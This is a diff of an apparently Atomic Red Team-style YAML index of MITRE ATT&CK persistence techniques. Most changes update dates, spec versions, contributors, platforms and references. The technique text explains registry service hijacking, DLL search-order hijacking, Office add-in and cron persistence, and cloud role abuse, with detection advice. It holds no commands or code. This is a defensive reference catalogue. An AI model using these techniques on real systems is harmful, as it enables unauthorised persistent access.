         Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe,  [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -28454,7 +28836,6 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Matthew Demaske, Adaptforward
@@ -28468,7 +28849,6 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -28495,8 +28875,8 @@ persistence:
         external_id: T1574.011
       - source_name: Tweet Registry Perms Weakness
         description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
-          April 9, 2018."
-        url: https://twitter.com/r0wdy_/status/936365549553991680
+          September 12, 2024."
+        url: https://x.com/r0wdy_/status/936365549553991680
       - source_name: insecure_reg_perms
         description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
           Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -28527,7 +28907,8 @@ persistence:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.011
     atomic_tests: []
   T1542.003:
@@ -28584,11 +28965,10 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1547:
     technique:
-      modified: '2024-04-16T12:26:07.945Z'
+      modified: '2024-09-12T15:27:58.051Z'
       name: Boot or Logon Autostart Execution
       description: |-
         Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
@@ -28660,9 +29040,9 @@ persistence:
           2017.
         url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
       - source_name: Microsoft Run Key
-        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa376977
+        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
       - source_name: Microsoft TimeProvider
         description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.
         url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
@@ -28678,12 +29058,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547
     atomic_tests: []
   T1547.014:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-22T14:17:17.353Z'
       name: Active Setup
       description: |-
         Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -28758,7 +29137,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.014
     atomic_tests: []
   T1542.005:
@@ -28801,7 +29179,7 @@ persistence:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
           Information. Retrieved October 21, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T16:35:53.806Z'
       name: TFTP Boot
       description: |-
         Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
@@ -28825,8 +29203,6 @@ persistence:
       - 'Firmware: Firmware Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1543.003:
     technique:
@@ -28981,31 +29357,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.003
     atomic_tests: []
   T1053.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
-      type: attack-pattern
-      created: '2019-12-03T14:25:00.538Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1053.003
-        url: https://attack.mitre.org/techniques/T1053/003
-      - source_name: 20 macOS Common Tools and Techniques
-        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
-        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
-          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T18:45:51.945Z'
       name: 'Scheduled Task/Job: Cron'
       description: "Adversaries may abuse the <code>cron</code> utility to perform
         task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -29022,6 +29378,7 @@ persistence:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor scheduled task creation from common utilities using
         command-line invocation. Legitimate scheduled tasks may be created during
         installation of new software or through system administration functions. Look
@@ -29032,9 +29389,13 @@ persistence:
         part of a chain of behavior that could lead to other activities, such as network
         connections made for Command and Control, learning details about the environment
         through Discovery, and Lateral Movement. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -29042,17 +29403,37 @@ persistence:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+      created: '2019-12-03T14:25:00.538Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1053/003
+        external_id: T1053.003
+      - source_name: 20 macOS Common Tools and Techniques
+        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1053.003
     atomic_tests: []
   T1137:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-15T16:01:21.255Z'
+      name: Office Application Startup
+      description: |-
+        Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
+
+        A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
       x_mitre_contributors:
       - Nick Carr, Mandiant
       - Microsoft Threat Intelligence Center (MSTIC)
@@ -29060,79 +29441,73 @@ persistence:
       - Praetorian
       - Loic Jaquemet
       - Ricardo Dias
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
+
+        Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
+
+        Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.4'
+      x_mitre_data_sources:
+      - 'File: File Creation'
+      - 'Application Log: Application Log Content'
+      - 'Windows Registry: Windows Registry Key Modification'
+      - 'File: File Modification'
+      - 'Module: Module Load'
+      - 'Process: Process Creation'
+      - 'Windows Registry: Windows Registry Key Creation'
+      - 'Command: Command Execution'
       type: attack-pattern
+      id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
       created: '2017-12-14T16:46:06.044Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1137
         url: https://attack.mitre.org/techniques/T1137
-      - source_name: SensePost Ruler GitHub
-        url: https://github.com/sensepost/ruler
-        description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange
-          services. Retrieved February 4, 2019.'
+        external_id: T1137
+      - source_name: Microsoft Detect Outlook Forms
+        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+          4, 2019.
+        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
       - source_name: TechNet O365 Outlook Rules
-        url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/
         description: Koeller, B.. (2018, February 21). Defending Against Rules and
           Forms Injection. Retrieved November 5, 2019.
+        url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/
       - source_name: CrowdStrike Outlook Forms
-        url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
         description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
           Movement and Persistence. Retrieved February 5, 2019.
-      - source_name: Outlook Today Home Page
-        url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
-        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
-          Retrieved February 5, 2019.
-      - source_name: Microsoft Detect Outlook Forms
-        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
-        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
-          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
-          4, 2019.
+        url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
+      - source_name: SensePost Ruler GitHub
+        description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange
+          services. Retrieved February 4, 2019.'
+        url: https://github.com/sensepost/ruler
       - source_name: SensePost NotRuler
-        url: https://github.com/sensepost/notruler
         description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
           provides blue teams with the ability to detect Ruler usage against Exchange.
           Retrieved February 4, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
-      name: Office Application Startup
-      description: |-
-        Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
-
-        A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: persistence
-      x_mitre_detection: |-
-        Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
-
-        Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
-
-        Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
-      x_mitre_version: '1.3'
+        url: https://github.com/sensepost/notruler
+      - source_name: Outlook Today Home Page
+        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
+          Retrieved February 5, 2019.
+        url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'File: File Creation'
-      - 'Application Log: Application Log Content'
-      - 'Windows Registry: Windows Registry Key Modification'
-      - 'File: File Modification'
-      - 'Module: Module Load'
-      - 'Process: Process Creation'
-      - 'Windows Registry: Windows Registry Key Creation'
-      - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1137
     atomic_tests: []
   T1098.003:
     technique:
-      modified: '2024-03-29T18:29:06.873Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Account Manipulation: Additional Cloud Roles'
       description: "An adversary may add additional roles or permissions to an adversary-controlled
         cloud account to maintain persistent access to a tenant. For example, adversaries
@@ -29162,6 +29537,7 @@ persistence:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - Alex Parsons, Crowdstrike
@@ -29172,6 +29548,7 @@ persistence:
       - Praetorian
       - Alex Soler, AttackIQ
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Collect activity logs from IAM services and cloud administrator
         accounts to identify unusual activity in the assignment of roles to those
@@ -29180,13 +29557,13 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - IaaS
       - SaaS
-      - Google Workspace
-      - Azure AD
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
       type: attack-pattern
@@ -29228,9 +29605,6 @@ persistence:
         url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.003
     atomic_tests:
     - name: Azure AD - Add Company Administrator Role to a user
@@ -29421,19 +29795,18 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.012
     atomic_tests: []
   T1574.001:
     technique:
-      modified: '2024-04-18T22:54:54.668Z'
+      modified: '2024-09-30T17:32:59.948Z'
       name: 'Hijack Execution Flow: DLL Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
 
         There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
 
-        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
 
         Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
 
@@ -29449,8 +29822,8 @@ persistence:
       - Travis Smith, Tripwire
       - Stefan Kanthak
       - Marina Liang
-      - Will Alexander
-      - Ami Holeston
+      - Ami Holeston, CrowdStrike
+      - Will Alexander, CrowdStrike
       x_mitre_deprecated: false
       x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
         modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -29464,7 +29837,7 @@ persistence:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -29490,6 +29863,10 @@ persistence:
         description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
           17, 2020.
         url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+      - source_name: Hexacorn DLL Hijacking
+        description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+          Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
       - source_name: Microsoft Security Advisory 2269637
         description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
           March 13, 2020.
@@ -29517,42 +29894,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1574.001
     atomic_tests: []
   T1137.006:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d
-      type: attack-pattern
-      created: '2019-11-07T19:52:52.801Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1137.006
-        url: https://attack.mitre.org/techniques/T1137/006
-      - url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460
-        description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.
-        source_name: Microsoft Office Add-ins
-      - url: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
-        description: Knowles, W. (2017, April 21). Add-In Opportunities for Office
-          Persistence. Retrieved July 3, 2017.
-        source_name: MRWLabs Office Persistence Add-ins
-      - source_name: FireEye Mail CDS 2018
-        url: https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf
-        description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail!
-          Enterprise Email Compromise. Retrieved April 22, 2019.
-      - source_name: GlobalDotName Jun 2019
-        url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
-        description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
-          - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T15:37:09.190Z'
       name: 'Office Application Startup: Add-ins'
       description: "Adversaries may abuse Microsoft Office add-ins to obtain persistence
         on a compromised system. Office add-ins can be used to add functionality to
@@ -29567,13 +29913,18 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins)
 
         Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Modification'
@@ -29581,11 +29932,34 @@ persistence:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'Process: Process Creation'
       - 'File: File Creation'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d
+      created: '2019-11-07T19:52:52.801Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1137/006
+        external_id: T1137.006
+      - source_name: FireEye Mail CDS 2018
+        description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail!
+          Enterprise Email Compromise. Retrieved April 22, 2019.
+        url: https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf
+      - source_name: MRWLabs Office Persistence Add-ins
+        description: Knowles, W. (2017, April 21). Add-In Opportunities for Office
+          Persistence. Retrieved July 3, 2017.
+        url: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
+      - source_name: Microsoft Office Add-ins
+        description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.
+        url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460
+      - source_name: GlobalDotName Jun 2019
+        description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
+          - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
+        url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1137.006
     atomic_tests: []
   T1505.002:
@@ -29616,7 +29990,7 @@ persistence:
         url: https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf
         description: 'Faou, M. (2019, May). Turla LightNeuron: One email away from
           remote code execution. Retrieved June 24, 2019.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T17:05:44.321Z'
       name: 'Server Software Component: Transport Agent'
       description: "Adversaries may abuse Microsoft transport agents to establish
         persistent access to systems. Microsoft Exchange transport agents can operate
@@ -29654,13 +30028,11 @@ persistence:
       - SYSTEM
       - Administrator
       - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1505.002
     atomic_tests: []
   T1574.014:
     technique:
-      modified: '2024-04-18T15:03:32.158Z'
+      modified: '2024-04-28T15:44:25.342Z'
       name: AppDomainManager
       description: "Adversaries may execute their own malicious payloads by hijacking
         how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -29686,7 +30058,7 @@ persistence:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Thomas B
-      - Ivy Bostock
+      - Ivy Drexel
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -29728,7 +30100,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1098.006:
     technique:
@@ -29806,11 +30177,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1053:
     technique:
-      modified: '2024-03-01T15:29:46.832Z'
+      modified: '2024-10-15T15:14:03.453Z'
       name: Scheduled Task/Job
       description: |-
         Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -29890,35 +30260,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Vincent Le Toux
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
-      type: attack-pattern
-      created: '2020-02-11T19:05:45.829Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.002
-        url: https://attack.mitre.org/techniques/T1556/002
-      - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
-        description: Fuller, R. (2013, September 11). Stealing passwords every time
-          they change. Retrieved November 21, 2017.
-        source_name: Carnal Ownage Password Filters Sept 2013
